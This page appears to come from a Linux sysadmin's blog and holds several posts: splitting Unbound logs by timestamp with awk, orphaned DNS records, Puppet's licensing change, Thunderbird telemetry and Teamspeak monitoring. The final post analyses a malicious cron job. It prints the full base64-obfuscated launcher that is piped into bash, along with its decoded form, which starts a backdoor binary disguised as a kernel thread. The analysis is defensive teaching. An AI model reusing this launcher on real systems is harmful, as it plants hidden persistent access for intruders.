Feuerfest

Just the private blog of a Linux sysadmin

Howto properly split all logfile content based on timestamps - and realizing my own fallacy

Photo by Mikhail Nilov: https://www.pexels.com/photo/person-in-black-hoodie-using-a-computer-6963061/

I use a Pi-hole for DNS based AdBlocking in my home network. Additionally I installed Unbound as recursive DNS resolver on it. Meaning: I can use the RaspberryPi in my network at home as the DNS server for all my devices. This way I don't have to use the DNS-Servers of my ISP granting me some additionally privacy. Additionally I can see which DNS queries are sent by each device. Leading to surprising revelations.

However recently my internet connection was interrupted and afterwards I noticed that I couldn't access any site or services where I used a domain or hostname to connect to. And while the problem itself (dnsmasq: Maximum number of concurrent DNS queries reached (max: 150)) was fixed easily with a simple restart of the unbound service, I noticed that the /var/log/unbound/unbound.log logfile was uncompressed, unrotated and 3.3 gigabyte in size. Whoops. That happens when no logrotate job is present.

Side gig: A logrotate config for Unbound

Fixing this issue was rather easy. A short search additionally revealed that unbound-control has a log_reopen option which is a good idea to trigger after the logrotate. This way Unbound properly closes old filehandles and uses the new logfile.

root@pihole:~# cat /etc/logrotate.d/unbound
/var/log/unbound/unbound.log {
        monthly
        missingok
        rotate 12
        compress
        delaycompress
        notifempty
        sharedscripts
        create 644
        postrotate
                /usr/sbin/unbound-control log_reopen
        endscript
}

But wait, there is more

However I had it on my list to dig deeper into the dnsmasq: Maximum number of concurrent DNS queries reached (max: 150) error in order to better understand the whole construct of Pi-hole, dnsmasq and Unbound.

However, the logfile was way too big to work conveniently with it. 49.184.687 lines are just too much. Especially on a RaspberryPi with the, in comparison, limited CPU power. Now I could have just split it up after n lines using split -l number-of-lines but that is:

  • Too easy and
  • Did I encounter the need for a script which splits logfile lines based on a range of timestamps more often in the recent time

How to properly split a logfile - and overcomplicating stuff

Most of the unbound logfile lines will have the Unix timestamp in brackets, followed by the process name, the log level the message belongs too and the actual message.

root@pihole:~# head -n 1 /var/log/unbound/unbound.log
[1700653509] unbound[499:0] debug: module config: "subnetcache validator iterator"

However some multi-line message wont follow this format:

[1700798246] unbound[1506:0] info: incoming scrubbed packet: ;; ->>HEADER<<- opcode: QUERY, rcode: NOERROR, id: 0
;; flags: qr aa ; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
chat.cdn.whatsapp.net.  IN      A

;; ANSWER SECTION:
chat.cdn.whatsapp.net.  60      IN      A       157.240.252.61

;; AUTHORITY SECTION:

;; ADDITIONAL SECTION:
;; MSG SIZE  rcvd: 55

[1700798246] unbound[1506:0] debug: iter_handle processing q with state QUERY RESPONSE STATE

This means we need the following technical approach:

  1. Generate the Unix-timestamp for the first day in a month at 00:00:00 o'clock
    • Alternatively formulated: The Unix-timestamp for the first second of a month
  2. Generate the Unix-timestamp for the last day of the month at 23:59:59 o'clock
    • The last second of a month
  3. Find the first occurrence of the timestamp from point 1
  4. Find the last occurrence of the timestamp from point 2
  5. Use sed to move the lines for each month into a separate logfile

I will however also show an awk command on how to filter based on the timestamps, useful for logfiles where every line is prefix with a timestamp.

Calculating with date

Luckily date is powerful and easy to use for date calculations. %s gives us the Unix timestamp. We do not need to specify hours:minutes:seconds as date automatically takes 00:00:00 for these values. Automatically giving us the first second of a day. And date also takes care of leap years and possible a lot of other nuisances when it comes to time and date calculations.

To get the last second of a month we simply take the first day of the month, add a month and subtract one second. It can't be easier.

# Unix timestamp for the first second in a month
user@host:~$ date -d "$(date +%Y/%m/01)" "+%Y/%m/%d %X - %s"
2024/11/01 00:00:00 - 1730415600

# Unix timestamp for the last second in a month
user@host:~$ date -d "$(date +%Y/%m/01) + 1 month - 1 second" "+%Y/%m/%d %X - %s"
2024/11/30 23:59:59 - 1733007599

To verify the value we can use this for-loop. It will give us all the date and timestamps we need to confirm that our commands are correct.

user@host:~$ for YEAR in {2023..2024}; do for MONTH in {1..12}; do echo -n "$(date -d "$(date +$YEAR/$MONTH/01)" "+%Y/%m/%d %X - %s")  "; date -d "$(date +$YEAR/$MONTH/01) + 1 month - 1 second" "+%Y/%m/%d %X - %s"; done; done
2023/01/01 00:00:00 - 1672527600  2023/01/31 23:59:59 - 1675205999
2023/02/01 00:00:00 - 1675206000  2023/02/28 23:59:59 - 1677625199
2023/03/01 00:00:00 - 1677625200  2023/03/31 23:59:59 - 1680299999
2023/04/01 00:00:00 - 1680300000  2023/04/30 23:59:59 - 1682891999
2023/05/01 00:00:00 - 1682892000  2023/05/31 23:59:59 - 1685570399
2023/06/01 00:00:00 - 1685570400  2023/06/30 23:59:59 - 1688162399
2023/07/01 00:00:00 - 1688162400  2023/07/31 23:59:59 - 1690840799
2023/08/01 00:00:00 - 1690840800  2023/08/31 23:59:59 - 1693519199
2023/09/01 00:00:00 - 1693519200  2023/09/30 23:59:59 - 1696111199
2023/10/01 00:00:00 - 1696111200  2023/10/31 23:59:59 - 1698793199
2023/11/01 00:00:00 - 1698793200  2023/11/30 23:59:59 - 1701385199
2023/12/01 00:00:00 - 1701385200  2023/12/31 23:59:59 - 1704063599
2024/01/01 00:00:00 - 1704063600  2024/01/31 23:59:59 - 1706741999
2024/02/01 00:00:00 - 1706742000  2024/02/29 23:59:59 - 1709247599
2024/03/01 00:00:00 - 1709247600  2024/03/31 23:59:59 - 1711922399
2024/04/01 00:00:00 - 1711922400  2024/04/30 23:59:59 - 1714514399
2024/05/01 00:00:00 - 1714514400  2024/05/31 23:59:59 - 1717192799
2024/06/01 00:00:00 - 1717192800  2024/06/30 23:59:59 - 1719784799
2024/07/01 00:00:00 - 1719784800  2024/07/31 23:59:59 - 1722463199
2024/08/01 00:00:00 - 1722463200  2024/08/31 23:59:59 - 1725141599
2024/09/01 00:00:00 - 1725141600  2024/09/30 23:59:59 - 1727733599
2024/10/01 00:00:00 - 1727733600  2024/10/31 23:59:59 - 1730415599
2024/11/01 00:00:00 - 1730415600  2024/11/30 23:59:59 - 1733007599
2024/12/01 00:00:00 - 1733007600  2024/12/31 23:59:59 - 1735685999

To verify we can do the reverse (Unix timestamp to date) with the following command:

user@host:~$ date -d @1698793200
Wed  1 Nov 00:00:00 CET 2023

Solution solely working on timestamps

As the logfile timestamp is enclosed in brackets we need to tell awk to treat either [ or ] as a field separator. Then we can use awk to check if the second field is in a given time frame. For the first test run we define the variables manually in our shell and adjust the date commands to only output the Unix timestamp.

And as the logfile starts in November 2023 I set the values accordingly. awk then conveniently puts all lines whose timestamp is between these to values into a separate logfile.

user@host:~$ YEAR=2023
user@host:~$ MONTH=11
user@host:~$ FIRST_SECOND=$(date -d "$(date +$YEAR/$MONTH/01)" "+%s")
user@host:~$ LAST_SECOND=$(date -d "$(date +$YEAR/$MONTH/01) + 1 month - 1 second" "+%s")
user@host:~$ awk -F'[\\[\\]]' -v MIN=${FIRST_SECOND} -v MAX=${LAST_SECOND} '{if($2 >= MIN && $2 =< MAX) print}' /var/log/unbound/unbound.log >> /var/log/unbound/unbound-$YEAR-$MONTH.log

And this would already work fine, if every line would start with the timestamp. As this is not the case we need to add a bit more logic.

So the resulting script would look like this:

user@host:~$ cat date-split.sh
#!/bin/bash
# vim: set tabstop=2 smarttab shiftwidth=2 softtabstop=2 expandtab foldmethod=syntax :

# Split a logfile based on timestamps

LOGFILE="/var/log/unbound/unbound.log"
AWK="$(command -v awk)"
GZIP="$(command -v gzip)"

for YEAR in {2023..2024}; do
  for MONTH in {1..12}; do

    # Logfile starts November 2023 and ends November 2024 - don't grep for values before/after that time window
    if  [[ "$YEAR" -eq 2023 && "$MONTH" -gt 10 ]] ||  [[ "$YEAR" -eq 2024 && "$MONTH" -lt 12 ]]; then

      # Debug
      echo "$YEAR/$MONTH"

      # Calculate first and last second of each month
      FIRST_SECOND="$(date -d "$(date +"$YEAR"/"$MONTH"/01)" "+%s")"
      LAST_SECOND="$(date -d "$(date +"$YEAR"/"$MONTH"/01) + 1 month - 1 second" "+%s")"

      # Export variables so the grep in the sub-shells have this value
      export FIRST_SECOND
      export LAST_SECOND

      # Split logfiles solely based on timestamps
      awk -F'[\\[\\]]' -v MIN=${FIRST_SECOND} -v MAX=${LAST_SECOND} '{if($2 >= MIN && $2 <= MAX) print}' unbound.log >> "unbound-$YEAR-$MONTH.log"

      # Creating all those separate logfiles will probably fill up our diskspace
      #  therefore we gzip them immediately afterwards
      "$GZIP" "/var/log/unbound/unbound-$YEAR-$MONTH.log"

    fi

  done;
done

However, this script is vastly over-engineered. Why? Read on.

StackOverflow to the rescue

I still had the problem with the multi-line log messages. At first I wanted to use grep to get the matching first and last line numbers with head and tail. But uh.. Yeah, I had a fallacy here. As still wouldn't have worked with multi-line logmessages without a timestamp. Also using grep like this is highly inefficient. While it would be fine for a one-time usage script I still hit a road block.

I just wasn't able to get awk to do what I wanted and I resorted to asking my question on StackOverflow. Better to get the input from others then wasting a lot of time.

awk to the rescue

It was only through the answer that I realized that my solution was a bit over-engineered. Why use date if you can use strftime to calculate the year and month from the timestamp directly? The initial answer was:

awk '
$1 ~ /^\[[0-9]+]$/ {
  f = "unbound-" strftime("%m-%Y", substr($1, 2, length($1)-2)) ".log"
  if (f != prev) close(f); prev = f
}
{
  print > f
}' unbound.log

How this works has been explained in detail on StackOverflow, so I just copy & paste it here.

For each line which first field is a [timestamp] (that is, matches regexp ^\[[0-9]+]$), we use substr and length to extract timestamp, strftime to convert it to a mm-YYYY string and assign "unbound-mm-YYYY.log" to variable f. In the second block, that applies to all lines, we print the current line in file f. Note: contrary to shell redirections, in awk, print > FILE appends to FILE.

Edit: as suggested by Ed Morton closing each file when we are done with it should significantly improve the performance if the total number of files is large. if (f != prev) close(f); prev = f added. Ed also noted that escaping the final ] in the regex is useless (and undefined behavior per POSIX). Backslash removed.

And this worked flawlessly. The generated monthly logfiles from my testfile matched exactly the line-numbers per month. Even multi-line log messages and empty lines were included.

All I then did was adding gzip to compress the files directly before the next file is created. Just to prevent filling up the disk completely. Additionally I change the filename from unbound-MM-YYYY.log to unbound-YYYY-MM.log. Yes, the logfile name won't work with logrotate. But I just need it to properly dig through the files and the Year-Month naming will be of great help here. Afterwards I don't need them anymore and will delete them. So this was none of my concern.

This was my new working solution:

awk '$1 ~ /^\[[0-9]+]$/ {
  f = "unbound-" strftime("%Y-%m", substr($1, 2, length($1)-2)) ".log"
  if (f != prev) {
    if (prev) system("gzip " prev)
    close(prev)
    prev = f
  }
}
{
  print > f
}
END {
  if (prev) system("gzip " prev)
}' unbound.log

No bash script with convoluted logic needed. And easily useable for other logfiles too. Just adopt the starting regular expression to match the one the logfile uses and adopt the logic for strftime so the proper timestamp can be created.

Sometimes it's better to ask other people. 😄

Comments

"It's always DNS."

Photo by Visual Tag Mx: https://www.pexels.com/photo/white-and-black-scrabble-tiles-on-a-white-surface-5652026/

"It's always DNS."
   - Common saying among system administrators, developers and network admins alike.

Recently my blogpost about Puppet's move to go semi-open-source gained some attention and I grew curious where it was mentioned and what people thought about it. Therefore I did a quick search for "puppet goes enshittyfication" and was presented with a few results. Mostly Mastodon posts but also one website from Austria (the one without Kangaroos 😁). Strangely they also copied the site title, not just the texts' title, as it showed up as "Feuerfest | Puppet goes enshittyfication".

Strange.

I clicked on it and received a certificate warning that the domain in the certificate doesn't match the domain I'm trying to visit.

I ignored the warning and was presented with a 1:1 copy of my blog. Just the images were missing. Huh? What? Is somebody copying my blog?

A short whois on the domain name revealed nothing shady. It belonged to an Austrian organization whose goal it is to inform about becoming a priest of the catholic church and help seminarians. Ok, so definitely nothing shady.

I looked at the certificate and.. What? It was issued for "admin.brennt.net" by Let's Encrypt. That shouldn't be possible from all I know, as that domain is validated to my Let's Encrypt account. I checked the certificates fingerprints and.. They were identical, huh?

That would mean that either someone managed to get the private key for my certificate (not good!) or created a fake private key which somehow a webserver accepted. And wouldn't Firefox complain about that or would the TLS handshake fail? (If somebody knows the answer to this, please comment. Thank you!)

I was confused.

Maybe the IP/hoster of the server will shed some light on this?

Aaaaand it was the current IP of this blog/host. Nothing shady. Nothing strange. Just orphaned DNS-records from a long-gone web-project.

As I know that Google - and probably any other search engine too - doesn't like duplicate content I helped myself with a RewriteRule inside this vHost.

# Rewrite for old, orphaned DNS records from other people..
RewriteEngine On
<If "%{HTTP_HOST} == 'berufungimzentrum.at'">
    RewriteRule "^(.*)$" "https://admin.brennt.net/please-delete.txt"
</If>

Now everyone visiting my site via "that other domain" will receive a nice txt-file asking to please remove/change the DNS entries.

It certainly IS always DNS.

EDIT: As I regularly read the logfiles of my webserver I noticed that there are additional domains who point to this host.. So I added additional If-Statements to my vHost-config and added the domains to the txt-file. 😇

Comments

Puppet goes enshittyfication (Updated)

Photo by Pixabay: https://www.pexels.com/photo/computer-screen-turned-on-159299/

This one came unexpected. Puppetlabs, the company behind the configuration management software Puppet, was purchased by Perforce Software in 2022 (and renamed to "Puppet by Perforce") and now, in November 2024 we start to see the fallout of this.

As Puppetlabs announced on November 7th 2024 in a blogpost they are, to use an euphemism: "Moving the Puppet source code in-house."

Or in their words (emphasizes by me):

In early 2025, Puppet will begin to ship any new binaries and packages developed by our team to a private, hardened, and controlled location. Our intention with this change is not to limit community access to Puppet source code, but to address the growing risk of vulnerabilities across all software applications today while continuing to provide the security, support, and stability our customers deserve.

They then go on in length to state why this doesn't affect customers/the community and that the community still can get access to that private, hardened and controlled location via a separate "development license (EULA)". However currently no information about the nature of that EULA is known and information will be released in early 2025 so after the split was made.

To say it bluntly: I call that bullshit. The whole talk around security and supply-chain risks is non-sense. If Puppet really wanted to enhance the technical security of their software product they could have achieved so in a myriad of other ways.

  • Like integrating a code scanner into their build pipelines
  • Doing regular code audits (with/from external companies)
  • Introducing a four-eyes-principle before commits are merged into the main branch
  • Participating in bug-bounty programs
  • And so on...

There is simply no reason to limit the access to the source-code to achieve that goal. (And I am not even touching the topic of FUD or how open source enables easier & faster spotting of software defects/vulnerabilities.) Therefore this can only be viewed as a straw-man fallacy type of expression to masquerade the real intention. I instead see it as what it truly is: An attempt to maximize revenue. After all Perforce wants to see a return for their investment. And as fair as this is, the "how" lets much to be desired...

We already have some sort-of proof. Ben Ford, a former Puppet employee wrote a blogpost Everything is on fire.... in mid October 2024 stating his negative experience with the executives and vice-presidents of Puppet he made in 2023 when he tried to explain the whole community topic to them (emphasizes by me):

"I know from personal experience with the company that they do not value the community for itself. In 2023, they flew me to Boston to explain the community to execs & VPs. Halfway through my presentation, they cut me off to demand to know how we monetize and then they pivoted into speculation on how we would monetize. There was zero interest in the idea that a healthy community supported a strong ecosystem from which the entire value of the company and product was derived. None. If the community didn’t literally hand them dollars, then they didn’t want to invest in supporting it."

I find that astonishing. Puppet is such a complex piece of configuration management software and has so many community-developed tools supporting it (think about g10k) that a total neglect of everything the community has achieved is mind-blowingly short-sighted. Puppet itself doesn't manage to keep up with all the tools they have released in the past. The ways of tools like Geppetto or the Puppet Plugin for IntellJ IDEA speak for themselves. Promising a fully-fledged Puppet IDE based on Eclispe and then letting it rot? No official support from "Puppet by Perforce" for one of the most used and commercially successful integrated development environment (IDE)? Wow. This is work the community contributes. And as we now know Puppet gives a damn about that. Cool.

EDIT November 13th 2024: I forgot to add some important facts regarding Puppets' ecosystem and the community:

I consider at least the container images to be of utmost priority for many customers. And neglecting all important tools around your core-product isn't going to help either. These are exactly the type of requirements customers have/questions they ask.

  • How can we run it ourself? Without constantly buying expensive support.
  • How long will it take until we build up sufficient experience?
  • What technology knowledge do our employees need in order to provide a flawless service?
  • How can we ease the routine tasks? / What tools are there to help us during daily business?

Currently Puppet has a steep learning curve which is only made easier thanks to the community. And now we know Perforce doesn't see this as any kind of addition to their companies' value. Great.

EDIT END

The most shocking part for myself was: That the Apache 2.0 license doesn't require that the source code itself is available. Simply publishing a Changelog should be enough to stay legally compliant (not talking about staying morally compliant here...). And as he pointed out in another blogpost from November 8th, 2024 there is reason they cannot change the license (emphasizes by me to match the authors'):

"But here’s the problem. It was inconsistently maintained over the history of the project. It didn’t even exist for the first years of Puppet and then later on it would regularly crash or corrupt itself and months would go by without CLA enforcement. If Perforce actually tried to change the license, it would require a long and costly audit and then months or years of tracking down long-gone contributors and somehow convincing them to agree to the license change.

I honestly think that’s the real reason they didn’t change the license. Apache 2 allows them to close the source away and only requires that they tell you what they changed. A changelog might be enough to stay technically compliant. This lets them pretend to be open source without actually participating."

I absolutely agree with him. They wanted to go closed-source but simply couldn't as previously they never intended to. Or as someone on the internet said: "Luckily the CLA is ironclad." So instead they did what was possible and that is moving the source-code to an internal repository. Using that as the source for all official Puppet packages - but will we as Community still have access to those packages?

For me, based on how the blogpost is written, I tend to say: No. Say goodbye to https://yum.puppetlabs.com/ and https://apt.puppetlabs.com/. Say goodbye to an easy way of getting your Puppet Server, Agent and Bolt packages for your Linux distribution of choice.

Update 15th November 2024: I asked Ben Ford in one of his Linkedin posts if there is a decision regarding the repositories and he replied with: "We will be meeting next week to discuss details. We'll all know a bit more then." As good as it is that this topic isn't off the table it still adds to the current uncertainty. Personally I would have thought that those are the details you finalize before making such an announcement.. But ah well, everyone is different.. Update End

A myriad of new problems

This creates a myriad of new problems.

1. We will see a breakline between "Puppet by Perforce"-Puppet packages and Community-packages in technical compatibility and, most likely, functionality too.

This mostly depends on how well Puppet contributes back to the Open Source repository and/or how well-written the Changelog is and regarding that I invite you to check some of their release notes for new Puppet server versions (Puppet Server 7 Release Notes / Puppet Server 8 Release Notes) although it got better with version 8... Granted they already stated the following in their blogpost (emphasizes by me):

We will release hardened Puppet releases to a new location and will slow down the frequency of commits of source code to public repositories.

This means customers using the open source variant of Puppet will be in somewhat dangerous waters regarding compatibility towards the commercial variant and vice-versa. And I'm not speaking about the inter-compatibility between Puppet servers from different packages alone. Things like "How the Puppet CA works" or "How are catalogues generated" etc. Keep in mind: Migrating from one product to the other can also get significantly harder.

This could even affect Puppet module development in case the commercial Puppet server contains resource types the community based one doesn't or does implement them slightly different. This will affect customers on both sides badly and doesn't make a good look for Puppet. Is Perforce sure this move wasn't sponsored by RedHat/Ansible? Their biggest competitioner?

2. Documentation desaster

As bad as the state of Puppet documentation is (I find it extremely lacking in every aspect) at least you have one and it's the only one. Starting 2025 we will have two sets of documentation. Have fun working out the kinks..

Additionally documentation wont get better. Apparently this source states that "Perforce actually axed our entire Docs team!" How good will a Changelog or the documentation be when it's nobody's responsibility?

3. Community provided packages vs. vendor packages

Nearly all customers I worked at have some kind of policy regarding what type of software is allowed on a system and how that is defined. Sometimes this goes so far as "No community supported software. Only software with official vendor support". Starting 2025 this would mean these customers would need to move to Puppet Enterprise and ditch the community packages. The problem I foresee is this: Many customers already use Ansible in parallel and most operations teams are tired having to use two configuration management solutions. This gives them a strong argument in favour of Ansible. Especially in times of economic hard-ship and budget cuts.

But again: Having packages from Puppet itself at least makes sure you have the same packages everywhere. In 2025 when the main, sole and primary source for those packages goes dark numerous others are likely to appear. Remember Oracles' move to make the Oracle JVM a paid-only product for commercial use? And how that fostered the creation of dozens of different JVMs? Yeah, that's a somewhat possible scenario for the Puppet Server and Agent too. Although I doubt we will ever see more than 3-4 viable parallel solutions at anytime given the amount of work and that Puppet isn't that widely required as a JVM is. Still this poses a huge operational risk for every customer.

4. Was this all intentional?

I'm not really sure if Perforce considered all this. However they are not stupid. They sure must see the ramifications of their change. And this will lead to customers asking themself ugly questions. Questions like: "Was this kind of uncertainty intentional?" This shatters trust on a basic level. Trust that might never be retained.

5. Community engagement & open source contributors

Another big question is community engagement. We now have a private equity company which thinks nothing about the community and the community knows this. There is already a drop in activity since the acquisition of Puppet by Perforce. I think this trend will continue. After all, with the current situation we will have a "We take everything from the community we want, but decide very carefully what and if we are giving anything back in return." This doesn't work for many open source contributors. And it is the main reason why many will view Puppet as being closed source from 2025 onward. Despite being technically still open source - but again the community values moral & ethics higher than legal correctness.

So, where are we heading?

Personally I wouldn't be too surprised if this is the moment where we are looking back to in the future and say: "This is the start of the downfall. This is when Puppet became more and more irrelevant until it's demise." As my personal viewpoint is that Puppet lacked vision and discipline for some years. Lot's of stuff was created, promoted and abandoned. Lot's of stuff was handed-over to the community to maintain it. But still the ecosystem wasn't made easier, wasn't streamlined. Documentation wasn't as detailed as it should be. Tools and command-line clients lacked certain features you'd have to work around yourself. And so on.. I even ditched Puppet for my homelab recently in favour of Ansible. The overhead I had to carry out to keep it running, the work on-top which was generated by Puppet itself, just to keep it running. Ansible doesn't have all of that.

In my text Get the damn memo already: Java11 reached end-of-life years ago I wrote:

If you sell software, every process involved in creating that piece of software should be treated as part of your core business and main revenue stream. Giving it the attention it deserves. If you don't, I'm going to make a few assumptions about your business. And those assumptions won't be favourable.

And this includes the community around your product. Especially more so for open source software.

Second I won't be surprised if many customers don't take the bite, don't switch to a commercial license, ride Puppet as long as it is feasible and then just switch to Ansible.

Maybe we will also see a fork. Giving the community the possibility to break with Puppet functionality. Not having to maintain compatibility any longer.

Time will tell.

New developments

This was added on November 15th: There are now the first commnity-build packages available. So looks like a fork is happening.

Read: https://overlookinfratech.com/2024/11/13/fork-announce/

EDIT: A newer post regarding the developments around the container topic and fork is here: Puppet is dead. Long live OpenVox!

Comments

First release of the Thunderbird for Android app and a little bit of drama

Photo by Pixabay: https://www.pexels.com/photo/red-pencil-on-top-of-white-window-envelope-236713/

I had already forgotten that Mozilla bought K9-Mail in June 2022 in order to transform K9-Mail into Thunderbird on Android. Now I was reminded again as on October 30th 2024 the first Android version of Thunderbird was released.

However the initial beta releases were accompanied by a little bit of drama regarding the data privacy topic. As the first releases of the Thunderbird App contained telemetry trackers from Mozilla and those were enabled by default (Opt-Out instead of the more data privacy friendly Opt-In). Additionally the user wasn't made aware of this during the install and configuration process.

These facts became aware to many users through the following GitHub Issue: Thunderbird Issue 8199: Expose the ability to mange Telemetry settings on first-time use where the reporter just stated in a factual way that he expects these settings to be off initially.

However the first reply to that issue didn't make things better. Apparently a Senior Manager/Mobile Engineering at MZLA Technologies Corporation, the subsidiary of the Mozilla Corporation of which Thunderbird is now a part of, wrote the following as a reply:

Unfortunately we cannot make this type of data collection opt-in because the limited data from voluntary reports wouldn’t provide enough insights to make informed product decisions. Opt-in data would come from a small, biased subset, leading to flawed conclusions.

Knowing the Android ecosystem covers a vast range of hardware and form factors, we need to have a mechanism to make better decisions on how features are being used, and have information in which environments user might be having trouble.

In line with Mozilla’s data practices, the default data collected contains no personal information. This helps us understand how features are used and where issues may occur, while minimizing data points and retaining only what's necessary. When we decide on new probes, we actively consider if we really need the information, and if there are ways we could reduce the needed retention time or scope.

While I can't offer an opt-in at this time, I understand your concerns and genuinely appreciate that you're thinking critically about privacy. You might also be interested in a recent talk about our need for privacy respecting telemetry. https://blog.thunderbird.net/2024/08/thunderbird-goes-to-guadec-2024/

This again sparked a lot of comments who can be sorted into the following categories:

  1. Disappointment that an application developed by Mozilla uses such shady practises. Along with criticism that users are not informed about this and there are no information on what type of information is gathered and how it is used.
  2. Notices on the various laws forbidding such data collection (especially the GDPR from the EU).
  3. Sadness that while K9-Mail was tracker free, Thunderbird obviously won't. Which disappoints many data privacy focused users.

Or as someone, sarcastically, pointed out on Mastodon (Source):

How could K-9 be developed and become the best email app for Android, and even make ‘informed product decisions’ without a tracker? Sarcasm over.

With the 8.0b2 release that feature was removed and will, hopefully, be reworked in a more user-consenting way.

Personally I am also very disappointed and my anticipation has taken a huge blow. Mozilla once stood as a beacon of user-centred interests. And while I wholeheartedly agree that they should be able to get usage metrics I too want this to happen in an open and consenting way. Enabling the user to actually make a choice and inform me about the nature of the data being transmitted.

Other resources

There is an FAQ what will happen to K9-Mail and Thunderbird in the future: https://blog.thunderbird.net/2022/06/faq-thunderbird-mobile-and-k-9-mail/

The roadmap can be found here: https://developer.thunderbird.net/planning/android-roadmap

Comments

Monitoring Teamspeak3 servers with check_teamspeak3 & Icinga2

Photo by cottonbro studio: https://www.pexels.com/photo/woman-sitting-on-the-floor-among-laptops-and-tangled-cables-and-wearing-goggles-8721343/

Just a short note as no one seems to really mention this. If you want to monitor your Teamspeak 3 server with Icinga2 (or Nagios or any other compatible monitoring system): check_teamspeak3 from xicon.eu / xiconfjs still works flawlessly despite the fact that the "Last commit" being 3 years old.

A little bit of background, or: UDP monitoring is hard

Teamspeak 3 - being a voice chat - utilizes UDP for most of it's services. Understandably as speed is key in providing enjoyable voice communications and simultaneously it can cope well with a few lost packets.

This however is the main problem in monitoring. With TCP you can open a simple TCP-Connect and if the port is open assume that your service is working. With UDP: You can't as UDP won't give you any feedback if any your packets were received as UDP in its entirety lacks the "Transmission Control" part of TCP in favour of faster packet sending/progressing. Therefore you have to send a request that provokes an reply and thus enables you to check that reply against your expected "Known good/working" reply.

This means that you must delve into the depths of a protocol in order to know what your packets must include. And this is the part where it often gets complicated, time-consuming and cumbersome. More often than not people rather went with a "Let's just check if the process is running." or "If the application opens a TCP-port too, let's just check that one." solution.

I however wanted a detailed check and check_teamspeak3 exactly does this. It connects to the voice datagram port and sends the appropriate encoded UDP packets and checks the result. Et voilĂ  we have a monitoring check that really checks the working condition.

Thanks xiconfjs!

Alternatives

For those coming here in order to search for other ways to monitor Teamspeak 3: You can of course do one of the following:

  • Check if the Teamspeak process is running
  • Examine the list of locally opened ports and check if the ports are in listening mode (lsof, netstat, etc.)
  • Expose the serverquery port and do your checks via commands (see: https://community.teamspeak.com/t/how-to-use-the-server-query/25386)
  • The FileTransfer part of Teamspeak uses a TCP port, you could verify that this port is open with a simple check_tcp servicecheck
Comments

Why basics matter

Photo by George Becker: https://www.pexels.com/photo/1-1-3-text-on-black-chalkboard-374918/

Someone on the Internet asked on Reddit what this CronJob does, as it looked strange.

{ echo L3Vzci9iaW4vcGtpbGwgLTAgLVUxMDA0IGdzLWRidXMgMj4vZGV2L251bGwgfHwgU0hFTEw9L2Jpbi9iYXNoIFRFUk09eHRlcm0tMjU2Y29sb3IgR1NfQVJHUz0iLWsgL2hvbWUvYWRtaW4vd3d3L2dzLWRidXMuZGF0IC1saXFEIiAvdXNyL2Jpbi9iYXNoIC1jICJleGVjIC1hICdba2NhY2hlZF0nICcvaG9tZS9hZG1pbi93d3cvZ3MtZGJ1cyciIDI+L2Rldi9udWxsCg==|base64 -d|bash;} 2>/dev/null #1b5b324a50524e47 >/dev/random

And for most people in that subreddit several things were immediately obvious:

  1. The commands are obfuscated by encoding them in base64. Are very common method to - sort of - hide malicious contents
  2. As such this is, most likely, a harmful, malicious CronJob not created by a legitimate user of that system
  3. The person asking lacks basic Linux knowledge as the |base64 -d|bash; part clearly states that the base64-string is decoded and piped into a bash process to be executed
    • Anyone with basic knowledge would simply have taken the string and piped it into base64 -d retrieving the decoded string for further analysis without executing it.

And if we do exactly that, we get the following decoded string:

user@host:~ $ echo L3Vzci9iaW4vcGtpbGwgLTAgLVUxMDA0IGdzLWRidXMgMj4vZGV2L251bGwgfHwgU0hFTEw9L2Jpbi9iYXNoIFRFUk09eHRlcm0tMjU2Y29sb3IgR1NfQVJHUz0iLWsgL2hvbWUvYWRtaW4vd3d3L2dzLWRidXMuZGF0IC1saXFEIiAvdXNyL2Jpbi9iYXNoIC1jICJleGVjIC1hICdba2NhY2hlZF0nICcvaG9tZS9hZG1pbi93d3cvZ3MtZGJ1cyciIDI+L2Rldi9udWxsCg==|base64 -d
/usr/bin/pkill -0 -U1004 gs-dbus 2>/dev/null || SHELL=/bin/bash TERM=xterm-256color GS_ARGS="-k /home/admin/www/gs-dbusdata -liqD" /usr/bin/bash -c "exec -a '[kcached]' '/home/admin/www/gs-dbus'" 2>/dev/null

With these commands do is explained fairly simple. pkill checks (the -0 parameter) if a process named gs-dbus is already running under the user ID 1004. If a process is found pkill exits with 0 and everything after the || (logical OR) is not executed.

The right part of the OR is only executed when pkill exits with a 1 as no process named gs-dbus is found. On the right part there are a few environment variables and parameters being set and the process is started via the /home/admin/www/gs-dbus binary and then renamed into [kcached].

And while this explains what is logically happening. It still doesn't explain what this CronJob actually does.

Now another person explained that it is the gs-dbus service from Gnome being started, if it isn't already running and claimed it being probably safe. Why this person came to this conclusion is beyond me. Probably because https://gitlab.gnome.org/GNOME/gnome-software/-/blob/main/src/gs-dbus-helper.c shows up as a result if you just search for gs-dbus. But again this person oversaw a some critical pieces of information.

And this made me taking my time to write this little blogpost about how to approach such situations.

As there are some crucial pieces of evidence which immediately tell me that this is not a legitimate piece of software.

  1. Base64 encoded hashes which get executed via bash are almost never doing anything good
  2. If that software really belongs to Gnome you have Systemd unit-Files or Timers. Or if that is a system without Systemd: You got good old init. But then again there would, most likely, be some kind of Gnome sub-process started by Gnome itself and not some obfuscated CronJob
  3. Renaming the processname to [kcached] makes it look like a kernel level thread. If there is an equivalent to "World biggest warning sign" this is it.
  4. The binary being started is /home/admin/www/gs-dbus. You notice www as being the folder where the binary is stored? Yeah, this is always an indicator that files in that folder are reachable via a Webserver. Hence I assume that /home/admin/www/ hosts some vulnerable web application and this was the entry point for the malicious software & CronJob.

As what the person missed is: Processes in square brackets are always kernel level threads, running as root and have a Parent Process ID (PPID) of 2. This means someone is renaming a process started by a non-root user to look like a kernel level thread. Obviously to feint the users and security mechanisms of that system. There is no legitimate reason to do so.

Would you investigate further or even kill that process when some scanning software reports a kernel level thread? Well, the obvious answer is: Of course, YES! But far too many inexperienced users won't.

All processes with [] around them are started by kthreadd - the Kernel Thread Daemon. kthreadd itself is started by the kernel during boot.

Therefore we have 3 truths about kernel level threads:

  1. They will always have the process ID 2 as their parent process ID (PPID)
  2. They will always run as root, never as a user
  3. They will always be started by [kthreadd] itself

Lets take a look at the following ps output from one of my Debian systems. I make it quick & dirty and simply grep for all processes with a [ in it.

user@host:~$ ps -eo pid,ppid,user,comm,args | grep "\["
      2       0 root     kthreadd        [kthreadd]
      3       2 root     rcu_gp          [rcu_gp]
      4       2 root     rcu_par_gp      [rcu_par_gp]
      5       2 root     slub_flushwq    [slub_flushwq]
      6       2 root     netns           [netns]
